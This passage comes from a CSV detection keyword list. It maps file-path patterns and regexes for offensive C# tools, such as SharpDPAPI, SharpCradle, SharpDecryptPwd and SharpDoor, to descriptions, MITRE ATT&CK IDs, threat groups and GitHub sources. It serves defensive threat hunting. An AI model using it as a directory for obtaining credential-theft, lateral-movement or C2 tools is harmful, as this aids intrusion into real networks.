T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10903" "*/SharpCloud.exe*",".{0,1000}\/SharpCloud\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10904" 
"*/SharpCloud.exe*",".{0,1000}\/SharpCloud\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10905" "*/SharpCloud.git*",".{0,1000}\/SharpCloud\.git.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","10906" "*/SharpCollection.git*",".{0,1000}\/SharpCollection\.git.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10907" "*/SharpCollection/*",".{0,1000}\/SharpCollection\/.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10908" "*/SharpCOM.exe*",".{0,1000}\/SharpCOM\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10909" "*/SharpCOM.exe*",".{0,1000}\/SharpCOM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly 
builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10910" "*/SharpCOM.exe*",".{0,1000}\/SharpCOM\.exe.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","1","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","10911" "*/SharpCOM.git*",".{0,1000}\/SharpCOM\.git.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","1","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","10912" "*/SharpCompile/*",".{0,1000}\/SharpCompile\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","10913" "*/sharpcompile_*.*",".{0,1000}\/sharpcompile_.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. 
This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","10914" "*/SharpCookieMonster.exe*",".{0,1000}\/SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 
- T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10915" "*/SharpCookieMonster.exe*",".{0,1000}\/SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10916" "*/SharpCradle/*",".{0,1000}\/SharpCradle\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 
- TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","N/A","10","10","279","57","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z","10917" "*/SharpCrashEventLog.exe*",".{0,1000}\/SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10918" "*/SharpCrashEventLog.exe*",".{0,1000}\/SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10919" "*/SharpCrashEventLog.exe*",".{0,1000}\/SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10920" "*/SharpDecryptPwd.exe*",".{0,1000}\/SharpDecryptPwd\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10921" "*/SharpDecryptPwd.git*",".{0,1000}\/SharpDecryptPwd\.git.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential 
Access","https://github.com/RowTeam/SharpDecryptPwd","1","1","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","10922" "*/SharpDecryptPwd2.exe*",".{0,1000}\/SharpDecryptPwd2\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10923" "*/SharpDir.exe*",".{0,1000}\/SharpDir\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10924" "*/SharpDir.exe*",".{0,1000}\/SharpDir\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10925" "*/SharpDir.exe*",".{0,1000}\/SharpDir\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10926" "*/SharpDirLister.exe*",".{0,1000}\/SharpDirLister\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10927" "*/SharpDomainSpray.exe*",".{0,1000}\/SharpDomainSpray\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - 
T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10928" "*/SharpDomainSpray.git*",".{0,1000}\/SharpDomainSpray\.git.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","10929" "*/SharpDoor.cs*",".{0,1000}\/SharpDoor\.cs.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","10930" "*/SharpDoor.exe*",".{0,1000}\/SharpDoor\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10931" "*/SharpDoor.exe*",".{0,1000}\/SharpDoor\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10932" "*/SharpDoor.exe*",".{0,1000}\/SharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","10933" "*/SharpDoor.git*",".{0,1000}\/SharpDoor\.git.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","10934" "*/SharpDoor.git*",".{0,1000}\/SharpDoor\.git.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote 
Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","10935" "*/SharpDPAPI.cna*",".{0,1000}\/SharpDPAPI\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10936" "*/SharpDPAPI.exe*",".{0,1000}\/SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10937" "*/SharpDPAPI.exe*",".{0,1000}\/SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - 
TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10938" "*/SharpDPAPI.exe*",".{0,1000}\/SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10939" "*/SharpDPAPI.exe*",".{0,1000}\/SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10940" 